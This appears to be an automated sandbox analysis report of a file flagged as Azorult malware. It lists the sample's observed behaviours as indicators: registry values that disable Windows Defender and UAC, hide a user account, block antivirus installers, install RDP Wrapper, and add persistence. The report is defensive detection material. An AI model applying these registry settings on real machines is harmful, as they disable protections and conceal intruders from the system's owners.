Analysis Overview
Threat Level: Known bad
The file https://pixeldrain.com/u/TcV2BREC was found to be: Known bad.
Malicious Activity Summary
Azorult
UAC bypass
Rms family
Modifies visiblity of hidden/system files in Explorer
Windows security bypass
RMS
Modifies Windows Defender Real-time Protection settings
Azorult family
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
Server Software Component: Terminal Services DLL
Drops file in Drivers directory
Downloads MZ/PE file
Modifies Windows Firewall
Sets file to hidden
Blocks application from running via registry modification
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
ACProtect 1.3x - 1.4x DLL software
ASPack v2.12-2.42
Looks up external IP address via web service
Password Policy Discovery
Modifies WinLogon
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
UPX packed file
Hide Artifacts: Hidden Users
Drops file in System32 directory
AutoIT Executable
Subvert Trust Controls: Mark-of-the-Web Bypass
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Kills process with taskkill
Modifies data under HKEY_USERS
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Runs net.exe
Runs .reg file with regedit
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
Suspicious use of SendNotifyMessage
NTFS ADS
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
System policy modification
Suspicious behavior: LoadsDriver
Suspicious use of SetWindowsHookEx
Gathers network information
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: SetClipboardViewer
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-27 00:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-27 00:39
Reported
2025-03-27 00:41
Platform
win11-20250313-en
Max time kernel
117s
Max time network
113s
Command Line
Signatures
Azorult
Azorult family
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
RMS
Rms family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Modifies Windows Firewall
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Password Policy Discovery
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Program Files\ByteFence | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Enigma Software Group | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\ESET | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\McAfee | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft JDX | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Zaxar | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\Common Files\System\iediagcmd.exe | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360 | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\COMODO | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Panda Security | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_540387301\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_540387301\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_540387301\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1395074356\data.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_874988062\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1318045798\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1318045798\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_540387301\keys.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_874988062\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_874988062\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1318045798\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1318045798\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_540387301\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1395074356\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1395074356\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1318045798\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\melter.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
